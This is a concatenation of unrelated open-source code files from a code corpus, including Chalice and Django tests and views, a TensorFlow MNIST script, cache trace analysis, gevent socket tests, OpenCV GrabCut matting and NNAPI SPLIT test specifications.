from chalicelib.models import Response, User, Form, FormOptions, Org
from chalicelib.routes import form_create
from unittest.mock import MagicMock
from bson.objectid import ObjectId
import datetime
from pymodm.errors import DoesNotExist
from chalice import UnauthorizedError
def create_org(userId):
try:
org = Org.objects.get({})
except DoesNotExist:
org = Org(cff_permissions={"a": "B"})
org.cff_permissions = {userId: {"Orgs_FormsCreate": True}}
org.save()
class FormCreate(unittest.TestCase):
def setUp(self):
app.current_request = MagicMock()
app.current_request.context = {"authorizer": {"id": "userid"}}
create_org(app.get_current_user_id())
super(FormCreate, self).setUp()
def tearDown(self):
Org.objects.delete()
super(FormCreate, self).tearDown()
def test_form_create_blank(self):
app.current_request.json_body = {
"name": "New name",
"schema": {"new": "schema"},
}
response = form_create()
form = Form.objects.get(
{"_id": ObjectId(response["res"]["form"]["_id"]["$oid"])}
)
self.assertTrue("Untitled" in form.name)
self.assertEqual(form.cff_permissions, {"userid": {"owner": True}})
def test_form_create_copy(self):
form1Id = ObjectId()
Form(
name="abc",
version=1,
center="None",
id=form1Id,
cff_permissions={"old": "cff_permissions"},
schema={"schema": "custom"},
uiSchema={"uiSchema": "custom"},
formOptions=FormOptions(
confirmationEmailInfo={"a": "B"},
paymentInfo={"c": "D"},
paymentMethods={"E": "F"},
dataOptions={"G": "H"},
defaultFormData={"I": "J"},
),
date_modified=datetime.datetime.now().isoformat(),
date_created=datetime.datetime.now().isoformat(),
).save()
app.current_request.json_body = {"formId": form1Id}
response = form_create()
form2 = Form.objects.get(
{"_id": ObjectId(response["res"]["form"]["_id"]["$oid"])}
)
form1 = Form.objects.get({"_id": form1Id})
self.assertEqual(form1.schema, form2.schema)
self.assertEqual(form1.uiSchema, form2.uiSchema)
self.assertEqual(form1.formOptions, form2.formOptions)
self.assertEqual(form2.cff_permissions, {"userid": {"owner": True}})
self.assertNotEqual(form1.name, form2.name)
self.assertTrue("Copy" in form2.name)
def test_form_create_unauthorized(self):
org = Org.objects.get({})
org.cff_permissions = {"a": "B"}
org.save()
app.current_request.json_body = {
"name": "<NAME>",
"schema": {"new": "schema"},
}
with self.assertRaises(UnauthorizedError):
response = form_create()
def test_form_create_unauthorized_no_org(self):
Org.objects.delete()
app.current_request.json_body = {
"name": "<NAME>",
"schema": {"new": "schema"},
}
with self.assertRaises(UnauthorizedError):
response = form_create()
|
StarcoderdataPython
|
8017558
|
#!/usr/bin/env python3
def main():
    n, p = map(int, input().split())
    a = list(map(int, input().split()))
    # Count even and odd elements.
    e, o = 0, 0
    for i in a:
        if i % 2 == 0:
            e += 1
        else:
            o += 1
    if n == e:
        # Every element is even, so every subset sum is even.
        print(2**n if p == 0 else 0)
    else:
        # With at least one odd element, exactly half of the 2**n subsets
        # have an even sum, so either parity admits 2**(n-1) subsets.
        print(2**(n-1))
main()
|
StarcoderdataPython
|
1854188
|
import numpy as np
from .. import OneHotEncoderRuntime
def test_transform():
ohe = OneHotEncoderRuntime()
X = np.array([['a'], ['b']])
X_act = ohe.fit_transform(X)
X_exp = np.array([[1, 0], [0, 1]])
assert np.all(X_exp == X_act)
|
StarcoderdataPython
|
8076271
|
<filename>runmnist.py<gh_stars>1-10
from __future__ import division
import numpy as np
import tensorflow as tf
from common import *
import datasets
from layers import *
import matplotlib.pyplot as plt
if __name__ == '__main__':
data = datasets.Mnistdata(ds=2)
sigma = 1
N = 4
lr = 0.1
rw = 0.01
layers = 8
Xbits = 14*14
ybits = 10
X = tf.placeholder(tf.float32, shape=[None,Xbits])
y_ = tf.placeholder(tf.float32, shape=[None,ybits])
y, selWs, lutWs = SelectLutLayers(N,Xbits,ybits,layers,kind="triangle",sigma=1)(X)
Ws = flatten_list(flatten_list(selWs)) + flatten_list(lutWs)
print("Total luts", len(flatten_list(lutWs)))
print("Total Muxes", len(flatten_list(flatten_list(selWs))))
loss = tf.nn.l2_loss(y-y_) + rw*binary_reg(Ws)
train_step = tf.train.GradientDescentOptimizer(lr).minimize(loss)
yscale = y > 0
y_scale = y_ > 0
correct_pred = tf.reduce_all(tf.equal(yscale,y_scale),1)
accuracy = tf.reduce_mean(tf.cast(correct_pred,tf.float32))
print("H1")
sample = 20
iters = 5000
losses = np.zeros(iters//sample)
with tf.Session() as sess:
print("H2")
tf.global_variables_initializer().run()
wval = None
for i in range(iters):
tdata = data.next_data(32)
print("H3")
_,yval,lossval,co_ped,ac= sess.run([train_step,y,loss,correct_pred,accuracy],feed_dict={X:tdata[0],y_:tdata[1]})
if (i%sample==0):
print(lossval, "("+str(i)+"/"+str(iters)+")")
print(" cor",scaleto01(tdata[1][0]))
print(" lrn",scaleto01(yval[0],False))
losses[i//sample] = lossval
print("co,ac",co_ped,ac)
print("Accuracy!")
print(accuracy.eval(feed_dict={X:data.test[0],y_:data.test[1]}))
print(sess.run(Ws[0]))
plt.figure(1)
plt.plot(losses)
plt.xlabel("iter/"+str(sample))
plt.ylabel("loss")
plt.show()
|
StarcoderdataPython
|
4933521
|
<filename>cacheTraceAnalysis/plot/workingset.py<gh_stars>1-10
"""
Plots how the total working set size increases over time.
"""
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../"))
from utils.common import *
import bisect
SLAB_SIZES = [96, 120, 152, 192, 240, 304, 384, 480, 600, 752, 944, 1184, 1480, 1856, 2320, 2904, 3632, 4544, 5680, 7104, 8880,
11104, 13880, 17352, 21696, 27120, 33904, 42384, 52984, 66232, 82792, 103496, 129376, 161720, 202152, 252696,
315872, 394840, 524288, 655360, 819200, 1024000, 1280000, 1600000, 2000000, 2500000, 3125000, 3906250,
]
def _cal_total_workingset_size(trace_reader, window=300, consider_ttl=True, slab_sizes=None):
""" calculate how working set size change over time
"""
metadata_name = "ttl_w{}_{}{}_{}.pickle".format(window, consider_ttl, "_slab" if slab_sizes is not None else "", trace_reader.trace_path.split("/")[-1])
loaded = load_metadata(metadata_name)
if loaded is not None:
return loaded
    ttl_obj = defaultdict(list)  # expiry timestamp -> ids of objects expiring then
workingset = {} # obj -> size
workingset_size = 0
workingset_size_list = []
sz_to_slab_mapping = {}
start_ts, current_ts, last_window_ts = -1, 0, 0
for req in trace_reader:
current_ts = req.real_time
if start_ts == -1:
start_ts = req.real_time
if req.op == "set" or req.op == "add":
if req.obj_id not in workingset:
sz = req.obj_size
# sz = 1
if slab_sizes is not None:
# find the slab this object will use
if sz not in sz_to_slab_mapping:
sz_slab = slab_sizes[bisect.bisect_right(slab_sizes, sz)]
sz_to_slab_mapping[sz] = sz_slab
sz = sz_slab
else:
sz = sz_to_slab_mapping[sz]
workingset_size += sz
workingset[req.obj_id] = sz
if consider_ttl and req.ttl != 0:
ttl_obj[current_ts+req.ttl].append(req.obj_id)
if consider_ttl and current_ts in ttl_obj:
for obj in ttl_obj[current_ts]:
workingset_size -= workingset[obj]
del workingset[obj]
del ttl_obj[current_ts]
if (req.real_time - start_ts) % window == 0 and req.real_time != last_window_ts:
workingset_size_list.append(workingset_size)
# print("{} append {}".format(req.real_time, workingset_size))
last_window_ts = req.real_time
save_metadata(workingset_size_list, metadata_name)
trace_reader.reset()
return workingset_size_list
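# Illustrative note on the slab rounding above: with SLAB_SIZES as defined,
# bisect.bisect_right(SLAB_SIZES, 100) == 1, so a 100-byte object is charged
# at SLAB_SIZES[1] == 120 bytes. Because bisect_right is used, an object whose
# size exactly matches a slab class is also bumped to the next larger class.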
def plot_total_workingset_size(trace_reader, window, consider_ttl=True, slab_sizes=None):
figname = "{}/{}_{}_workingset".format(FIG_DIR, trace_reader.trace_path.split("/")[-1], window)
if consider_ttl:
figname = "{}_ttl".format(figname)
if slab_sizes is not None and slab_sizes is not False:
figname = "{}_slab".format(figname)
if slab_sizes is True:
slab_sizes = SLAB_SIZES
n_color = 2
if slab_sizes:
n_color = 4
plt.set_n_colors(n_color)
ret_dict = {}
workingset_size_list = _cal_total_workingset_size(trace_reader, window, False, slab_sizes=None)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="no-ttl")
ret_dict["no-ttl"] = workingset_size_list[-1]
if consider_ttl:
workingset_size_list = _cal_total_workingset_size(trace_reader, window, True, slab_sizes=None)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="ttl")
ret_dict["ttl"] = workingset_size_list[-1]
if slab_sizes:
workingset_size_list = _cal_total_workingset_size(trace_reader, window, False, slab_sizes=slab_sizes)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="no-ttl-slab")
ret_dict["no-ttl-slab"] = workingset_size_list[-1]
workingset_size_list = _cal_total_workingset_size(trace_reader, window, True, slab_sizes=slab_sizes)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="ttl-slab")
ret_dict["ttl-slab"] = workingset_size_list[-1]
if "ttl" in ret_dict and ret_dict["no-ttl"]/ret_dict["ttl"] > 100:
plt.yscale("log")
plt.xlabel("Time (hour)")
plt.ylabel("Working set size (MB)")
# plt.ylabel("Working set size (# million Obj)")
plt.legend()
plt.grid(linestyle="--")
plt.savefig(figname, no_save_plot_data=True)
plt.clf()
return ret_dict
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("--trace", type=str, help="trace path")
ap.add_argument("--window", type=int, default=300, help="window size")
p = ap.parse_args()
reader = TwrShortBinTraceReader(p.trace)
plot_total_workingset_size(reader, p.window)
|
StarcoderdataPython
|
9758079
|
<gh_stars>1-10
"""<NAME>'s aospy.Proj object for CMIP5 data."""
from aospy.proj import Proj
from aospy_user import regions, models
cmip5 = Proj(
'cmip5',
direc_out='/work/Spencer.Hill/',
tar_direc_out='/archive/Spencer.Hill/',
nc_dir_struc='one_dir',
models=(
models.bcc_csm1, models.bnu_esm, models.cccma_canam4,
models.cccma_cancm4, models.cccma_canesm2, models.cmcc_cesm,
models.cmcc_cm, models.cmcc_cms, models.cnrm_cm5, models.cnrm_cm5_2,
models.cola_cfsv2, models.csiro_bom_access1_0,
models.csiro_bom_access1_3, models.csiro_qccce_mk3_6_0, models.fio_esm,
models.ichec_ec_earth, models.inm_cm4, models.inpe_hadgem2_es,
models.ipsl_cm5a_lr, models.ipsl_cm5a_mr, models.ipsl_cm5b_lr,
models.lasg_cess_fgoals_g2, models.lasg_iap_fgoals_g1,
models.lasg_iap_fgoals_s2, models.miroc4h, models.miroc5,
models.miroc_esm, models.miroc_esm_chem, models.mohc_hadcm3,
models.mohc_hadgem2_a, models.mohc_hadgem2_cc,
models.mohc_hadgem2_es, models.mpi_m_esm_lr, models.mpi_m_esm_mr,
models.mpi_m_esm_p, models.mri_agcm3_2h, models.mri_agcm3_2s,
models.mri_cgcm3, models.mri_esm1, models.nasa_giss_e2_h,
models.nasa_giss_e2_h_cc, models.nasa_giss_e2_r,
models.nasa_giss_e2_r_cc, models.nasa_gmao_geos_5, models.ncar_ccsm4,
models.ncc_noresm1_m, models.ncc_noresm1_me, models.ncep_cfsv2_2011,
models.nimr_kma_hadgem2_ao, models.gfdl_cm2_1, models.gfdl_cm3,
models.gfdl_esm2m, models.gfdl_esm2g, models.gfdl_hiram_c180,
models.gfdl_hiram_c360, models.cesm1_bgc, models.cesm1_cam5,
models.cesm1_fastchem, models.cesm1_waccm, models.smhi_ec_earth,
models.unsw_csiro_mk3l_1_2
),
default_models=(
models.bcc_csm1,
models.cccma_canam4,
models.cnrm_cm5,
models.ichec_ec_earth,
models.ipsl_cm5a_lr,
models.ipsl_cm5b_lr,
models.lasg_cess_fgoals_g2,
models.miroc5,
models.mohc_hadgem2_a,
models.mpi_m_esm_lr,
models.mpi_m_esm_mr,
models.mri_cgcm3,
models.ncar_ccsm4,
models.cesm1_cam5
),
regions=(
regions.globe,
regions.nh,
regions.sh,
regions.tropics,
regions.wpwp,
regions.epac,
regions.sahel,
regions.sahel2,
regions.sahel3,
regions.sahara,
regions.ind_monsoon,
regions.land,
regions.ocean,
regions.trop_land,
regions.trop_ocean,
regions.sahel_south,
regions.sahel_north,
regions.sahel_east,
regions.sahel_west
)
)
|
StarcoderdataPython
|
11306522
|
from django.conf import settings
from django.core.files.storage import FileSystemStorage
upload_storage = FileSystemStorage(location=settings.UPLOAD_ROOT)
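# Illustrative usage (the model and field names below are hypothetical, not
# part of this module):
#   from django.db import models
#   class Upload(models.Model):
#       file = models.FileField(upload_to='uploads/', storage=upload_storage)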
|
StarcoderdataPython
|
8114516
|
<filename>reports_api/reports/models/speaker_registration.py
"""
* Copyright 2019 OpenStack Foundation
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from django.db import models
from .speaker import Speaker
class SpeakerRegistration(models.Model):
id = models.IntegerField(db_column='ID', primary_key=True)
confirmation_date = models.DateTimeField(db_column='ConfirmationDate')
email = models.TextField(db_column='Email')
confirmed = models.BooleanField(db_column='IsConfirmed')
speaker = models.OneToOneField(
Speaker, on_delete=models.CASCADE, related_name='registration', db_column='SpeakerID')
    def __str__(self):
        return str(self.id)
class Meta:
app_label = 'reports'
db_table = 'SpeakerRegistrationRequest'
|
StarcoderdataPython
|
11366931
|
<filename>pythonbrasil/exercicios/repeticao/ER resp 26.py
'''
In an election there are three candidates. Write a program that asks for the
total number of voters, asks each voter to vote, and at the end shows the
number of votes each candidate received.
'''
cand1, cand2, cand3 = 0,0,0
print('******************************************************')
print('********************* ELECTIONS **********************')
print('******************************************************')
print('\n')
eleitores = int(input('\tEnter the total number of voters: '))
print('')
for i in range(eleitores):
    voto = int(input('\t Vote for a candidate (1,2,3): '))
    if voto == 1:
        cand1 += 1
    elif voto == 2:
        cand2 += 1
    elif voto == 3:
        cand3 += 1
print('\n')
print('\t\t VOTE TOTALS:')
print('\t\t Candidate 1: ', cand1)
print('\t\t Candidate 2: ', cand2)
print('\t\t Candidate 3: ', cand3)
print('\n')
print('******************************************************')
print('******************************************************')
print('******************************************************')
|
StarcoderdataPython
|
8122293
|
<filename>greentest-py3/test__socket.py
import os
import sys
import array
import gevent
from gevent import socket
import greentest
import time
class TestTCP(greentest.TestCase):
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
def setUp(self):
greentest.TestCase.setUp(self)
self.listener = greentest.tcp_listener(('127.0.0.1', 0))
def tearDown(self):
del self.listener
greentest.TestCase.tearDown(self)
def create_connection(self):
return socket.create_connection(('127.0.0.1', self.listener.getsockname()[1]))
    def sendall(self, data):
        def accept_and_read():
            conn, addr = self.listener.accept()
            fd = conn.makefile()
            conn.close()
            read = fd.read()
            fd.close()
            return read
        server = gevent.spawn(accept_and_read)
        try:
            client = self.create_connection()
            # Python 3 sockets only accept bytes-like data:
            if isinstance(data, str):
                data = data.encode('ascii')
            client.sendall(data)
            client.close()
            read = server.get()
            assert read == self.long_data
        finally:
            server.kill()
def test_sendall_str(self):
self.sendall(self.long_data)
def test_sendall_unicode(self):
self.sendall(str(self.long_data))
    def test_sendall_array(self):
        # array("u") stores wide unicode code units; send plain bytes so the
        # text read back matches long_data under Python 3.
        data = array.array("b", self.long_data.encode('ascii'))
        self.sendall(data)
def test_fullduplex(self):
def server():
(client, addr) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
N = 100000 # must be a big enough number so that sendall calls trampoline
            sender = gevent.spawn(client.sendall, b't' * N)
            result = client.recv(1000)
            assert result == b'hello world', result
sender.join(timeout=0.2)
sender.kill()
sender.get()
#print '%s: client' % getcurrent()
server_proc = gevent.spawn(server)
client = self.create_connection()
client_reader = gevent.spawn(client.makefile().read)
gevent.sleep(0.001)
        client.send(b'hello world')
# close() used to hang
client.close()
# this tests "full duplex" bug;
server_proc.get()
client_reader.get()
def test_recv_timeout(self):
acceptor = gevent.spawn(self.listener.accept)
try:
client = self.create_connection()
client.settimeout(0.1)
start = time.time()
try:
data = client.recv(1024)
except self.TIMEOUT_ERROR:
assert 0.1 - 0.01 <= time.time() - start <= 0.1 + 0.1, (time.time() - start)
else:
raise AssertionError('%s should have been raised, instead recv returned %r' % (self.TIMEOUT_ERROR, data, ))
finally:
acceptor.get()
def test_sendall_timeout(self):
acceptor = gevent.spawn(self.listener.accept)
try:
client = self.create_connection()
client.settimeout(0.1)
start = time.time()
send_succeed = False
            data_sent = b'h' * 100000
try:
client.sendall(data_sent)
except self.TIMEOUT_ERROR:
assert 0.1 - 0.01 <= time.time() - start <= 0.1 + 0.1, (time.time() - start)
else:
assert time.time() - start <= 0.1 + 0.01, (time.time() - start)
send_succeed = True
finally:
conn, addr = acceptor.get()
if send_succeed:
client.close()
                data_read = conn.makefile('rb').read()
self.assertEqual(len(data_sent), len(data_read))
self.assertEqual(data_sent, data_read)
print('%s: WARNING: read the data instead of failing with timeout' % self.__class__.__name__)
def test_makefile(self):
        def accept_once():
            conn, addr = self.listener.accept()
            fd = conn.makefile('w')
            conn.close()
            fd.write('hello\n')
            fd.close()
acceptor = gevent.spawn(accept_once)
try:
client = self.create_connection()
fd = client.makefile()
client.close()
assert fd.readline() == 'hello\n'
assert fd.read() == ''
fd.close()
finally:
acceptor.get()
if hasattr(socket, 'ssl'):
class TestSSL(TestTCP):
certfile = os.path.join(os.path.dirname(__file__), 'test_server.crt')
privfile = os.path.join(os.path.dirname(__file__), 'test_server.key')
TIMEOUT_ERROR = socket.sslerror
def setUp(self):
TestTCP.setUp(self)
self.listener = ssl_listener(('127.0.0.1', 0), self.privfile, self.certfile)
def create_connection(self):
return socket.ssl(socket.create_connection(('127.0.0.1', self.listener.getsockname()[1])))
def ssl_listener(address, private_key, certificate):
import _socket
r = _socket.socket()
sock = socket.ssl(r, private_key, certificate)
greentest.bind_and_listen(sock, address)
return sock
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
class TestCreateConnection(greentest.TestCase):
__timeout__ = 5
def test(self):
try:
socket.create_connection(('localhost', get_port()), timeout=30, source_address=('', get_port()))
except socket.error:
ex = sys.exc_info()[1]
if 'refused' not in str(ex).lower():
raise
else:
raise AssertionError('create_connection did not raise socket.error as expected')
class TestClosedSocket(greentest.TestCase):
switch_expected = False
def test(self):
sock = socket.socket()
sock.close()
try:
            sock.send(b'a', timeout=1)
except socket.error as ex:
if ex.args[0] != 9:
raise
if __name__ == '__main__':
greentest.main()
|
StarcoderdataPython
|
1830800
|
<reponame>Shanduur/monorepo<gh_stars>0
import requests
import os
import time
import re
import logging
import ipaddress
from pythonjsonlogger import jsonlogger
log = logging.getLogger()
__log_handler = logging.StreamHandler()
__formatter = jsonlogger.JsonFormatter('%(asctime)s %(levelname)s %(message)s')
__log_handler.setFormatter(__formatter)
log.addHandler(__log_handler)
log.setLevel(logging.WARN)
def parse_timeout(timeout: str) -> float:
    regexp = r'(\d+[Hh])|(\d+[Mm])|(\d+[Ss])'
t = 1.0
if not timeout:
raise ValueError('Timeout was not provided')
m = re.match(regexp, timeout)
if not m:
raise ValueError('Timeout has wrong format')
if 'H' in timeout or 'h' in timeout:
t = t * 60*60
elif 'M' in timeout or 'm' in timeout:
t = t * 60
elif 'S' in timeout or 's' in timeout:
pass
return t * float(timeout[:-1])
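# A few illustrative values for parse_timeout, derived from the implementation
# above:
#   parse_timeout('6H')  -> 21600.0
#   parse_timeout('15m') -> 900.0
#   parse_timeout('30s') -> 30.0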
class Updater():
def __init__(self):
self.config = dict()
self.config['token'] = os.getenv('DUCKDNS_TOKEN')
self.config['domains'] = os.getenv('DOMAINS')
lvl = os.getenv('LOG_LEVEL')
if lvl:
log.setLevel(lvl)
try:
self.timeout = parse_timeout(os.getenv('TIMEOUT'))
except ValueError as e:
log.warning(f'{e}: using default (6H)')
self.timeout = parse_timeout('6H')
self.ip_api_uri = r'https://api64.ipify.org'
def __get_ip(self):
resp = requests.get(self.ip_api_uri)
if resp.status_code == 200:
self.config['ip'] = resp.text
else:
            log.error(f'unable to get public IP: {resp.reason}')
def __parse_update_uri(self) -> str:
self.__get_ip()
root = 'https://www.duckdns.org/update?'
params = list()
params.append(f"domains={self.config['domains']}")
params.append(f"token={self.config['token']}")
try:
ip = ipaddress.ip_address(self.config['ip'])
if type(ip) == ipaddress.IPv4Address:
params.append(f"ipv4={self.config['ip']}")
elif type(ip) == ipaddress.IPv6Address:
params.append(f"ipv6={self.config['ip']}")
        except (ValueError, TypeError):
raise ValueError('wrong IP provided')
uri = root + "&".join(params)
log.debug(uri)
return uri
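    # Example of a generated update URI (domain and token values hypothetical):
    #   https://www.duckdns.org/update?domains=example&token=abc123&ipv4=1.2.3.4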
def __update(self):
while True:
resp = requests.get(self.__parse_update_uri())
if resp.text == 'KO':
                log.error('unable to update ip')
log.debug(self.config)
log.info('sleeping...')
time.sleep(self.timeout)
def run(self) -> None:
self.__get_ip()
self.__update()
def main() -> None:
try:
upd = Updater()
upd.run()
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
9679102
|
import numpy as np
import cv2
class Grab_cut(object):
suffix = '.jpg'
def __init__(self, filename=None):
self.filename = filename
self.height = None
self.width = None
def image_matting(self, image_file, shape, iteration=10):
points = shape['points']
xmin, ymin, xmax, ymax = Grab_cut.convertPoints2BndBox(points)
self.width = xmax - xmin
self.height = ymax - ymin
src_img = cv2.imread(image_file)
mask = np.zeros(src_img.shape[:2], np.uint8)
bgdModel = np.zeros((1, 65), np.float64)
fgdModel = np.zeros((1, 65), np.float64)
rect = (xmin, ymin, self.width, self.height)
# Grabcut
cv2.grabCut(src_img, mask, rect, bgdModel, fgdModel,
iteration, cv2.GC_INIT_WITH_RECT)
        # Note: cv2.imread returns BGR, so these names are swapped relative to
        # the actual channels; the final merge still produces B, G, R, A order,
        # which is what cv2.imwrite expects.
        r_channel, g_channel, b_channel = cv2.split(src_img)
        a_channel = np.where((mask == 2) | (mask == 0), 0, 255).astype('uint8')
        # Crop to the bounding box of the foreground by scanning the alpha
        # (GrabCut mask) channel from each side:
        for row in range(ymin, ymax):
            if sum(a_channel[row, xmin:xmax + 1]) > 0:
                out_ymin = row
                break
        for row in range(ymin, ymax)[::-1]:
            if sum(a_channel[row, xmin:xmax + 1]) > 0:
                out_ymax = row + 1
                break
for col in range(xmin, xmax):
if sum(a_channel[ymin:ymax + 1, col]) > 0:
out_xmin = col
break
for col in range(xmin, xmax)[::-1]:
if sum(a_channel[ymin:ymax + 1, col]) > 0:
out_xmax = col + 1
break
# output image
img_RGBA = cv2.merge((r_channel[out_ymin:out_ymax, out_xmin:out_xmax],
g_channel[out_ymin:out_ymax, out_xmin:out_xmax],
b_channel[out_ymin:out_ymax, out_xmin:out_xmax],
a_channel[out_ymin:out_ymax, out_xmin:out_xmax]))
return img_RGBA
@staticmethod
def convertPoints2BndBox(points):
xmin = float('inf')
ymin = float('inf')
xmax = float('-inf')
ymax = float('-inf')
for p in points:
x = p[0]
y = p[1]
xmin = min(x, xmin)
ymin = min(y, ymin)
xmax = max(x, xmax)
ymax = max(y, ymax)
# <NAME>, 2015/11/12
# 0-valued coordinates of BB caused an error while
# training faster-rcnn object detector.
if xmin < 1:
xmin = 1
if ymin < 1:
ymin = 1
return (int(xmin), int(ymin), int(xmax), int(ymax))
@staticmethod
def resultSave(save_path, image_np):
cv2.imwrite(save_path, image_np)
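# Minimal usage sketch (file names and rectangle points are hypothetical; a
# PNG output is assumed so the alpha channel survives saving):
#   matting = Grab_cut()
#   rgba = matting.image_matting('input.jpg', {'points': [(10, 10), (200, 180)]})
#   Grab_cut.resultSave('output.png', rgba)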
|
StarcoderdataPython
|
5032405
|
'''The default configuration for pythonagent'''
DEFAULT_AGENT_CONFIG = {
'_use_console_span_exporter': False,
'enabled': True,
'propagation_formats': ['TRACECONTEXT'],
'service_name': 'pythonagent',
'reporting': {
'endpoint': 'http://localhost:4317',
'secure': False,
'trace_reporter_type': 'OTLP',
'token': '',
'opa': {
'endpoint': 'http://opa.traceableai:8181/',
'poll_period_seconds': 60,
'enabled': False,
}
},
'data_capture': {
'http_headers': {
'request': True,
'response': True,
},
'http_body': {
'request': True,
'response': True,
},
'rpc_metadata': {
'request': True,
'response': True,
},
'rpc_body': {
'request': True,
'response': True,
},
'body_max_size_bytes': 131072
},
'resource_attributes': {}
}
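# Illustrative helper (not part of the original module): one way a caller
# might overlay user-supplied settings onto these defaults without mutating
# them. The name ``merge_config`` is hypothetical.
def merge_config(overrides, base=None):
    """Recursively merge ``overrides`` into a copy of the defaults."""
    import copy
    merged = copy.deepcopy(DEFAULT_AGENT_CONFIG if base is None else base)
    for key, value in overrides.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = merge_config(value, merged[key])
        else:
            merged[key] = value
    return merged
# Example: merge_config({'reporting': {'secure': True}}) keeps every other
# default but flips reporting.secure to True.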
|
StarcoderdataPython
|
5020475
|
# -*- coding: utf-8 -*-
from Instanssi.common.http import Http403
from Instanssi.common.auth import staff_access_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from Instanssi.ext_blog.models import BlogEntry
from Instanssi.admin_blog.forms import BlogEntryForm, BlogEntryEditForm
from Instanssi.admin_base.misc.custom_render import admin_render
# Logging related
import logging
logger = logging.getLogger(__name__)
@staff_access_required
def index(request, sel_event_id):
# Post
if request.method == 'POST':
# Check for permissions
if not request.user.has_perm('ext_blog.add_blogentry'):
raise Http403
# Handle form
form = BlogEntryForm(request.POST)
if form.is_valid():
entry = form.save(commit=False)
entry.event_id = int(sel_event_id)
entry.date = timezone.now()
entry.user = request.user
entry.save()
logger.info('Blog entry "'+entry.title+'" added.', extra={'user': request.user, 'event_id': sel_event_id})
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
else:
form = BlogEntryForm()
# Get events
entries = BlogEntry.objects.filter(event_id = sel_event_id)
# Render response
return admin_render(request, "admin_blog/index.html", {
'entries': entries,
'selected_event_id': int(sel_event_id),
'addform': form,
})
@staff_access_required
def edit(request, sel_event_id, entry_id):
# Check for permissions
if not request.user.has_perm('ext_blog.change_blogentry'):
raise Http403
# Get old entry
entry = get_object_or_404(BlogEntry, pk=entry_id)
# Go ahead and edit
if request.method == 'POST':
form = BlogEntryEditForm(request.POST, instance=entry)
if form.is_valid():
entry = form.save()
logger.info('Blog entry "'+entry.title+'" edited.', extra={'user': request.user, 'event_id': sel_event_id})
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
else:
form = BlogEntryEditForm(instance=entry)
# Render response
return admin_render(request, "admin_blog/edit.html", {
'editform': form,
'selected_event_id': int(sel_event_id),
})
@staff_access_required
def delete(request, sel_event_id, entry_id):
# Check for permissions
if not request.user.has_perm('ext_blog.delete_blogentry'):
raise Http403
# Delete entry
try:
entry = BlogEntry.objects.get(id=entry_id)
entry.delete()
logger.info('Blog entry "'+entry.title+'" deleted.', extra={'user': request.user, 'event_id': sel_event_id})
except BlogEntry.DoesNotExist:
pass
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
|
StarcoderdataPython
|
4826324
|
<reponame>aosp-goes-brrbrr/packages_modules_NeuralNetworks
#
# Copyright (C) 2019 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{6}, 1.0, -128")
axis = Int32Scalar("axis", 0)
num_splits = Int32Scalar("num_splits", 3)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
output2 = Output("output2", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1, output2))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -126],
output1: [-125, -124],
output2: [-123, -122],
}
# Instantiate an example
Example((input_dict, output_dict)).AddRelaxed()
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 3}, 2.0, -125")
axis = Int32Scalar("axis", 0)
num_splits = Int32Scalar("num_splits", 2)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{1, 3}, 2.0, -125")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{1, 3}, 2.0, -125")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -126, -125],
output1: [-124, -123, -122],
}
# Instantiate an example
Example((input_dict, output_dict)).AddRelaxed()
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 3}, 2.0, -125")
axis = Int32Scalar("axis", 1)
num_splits = Int32Scalar("num_splits", 3)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
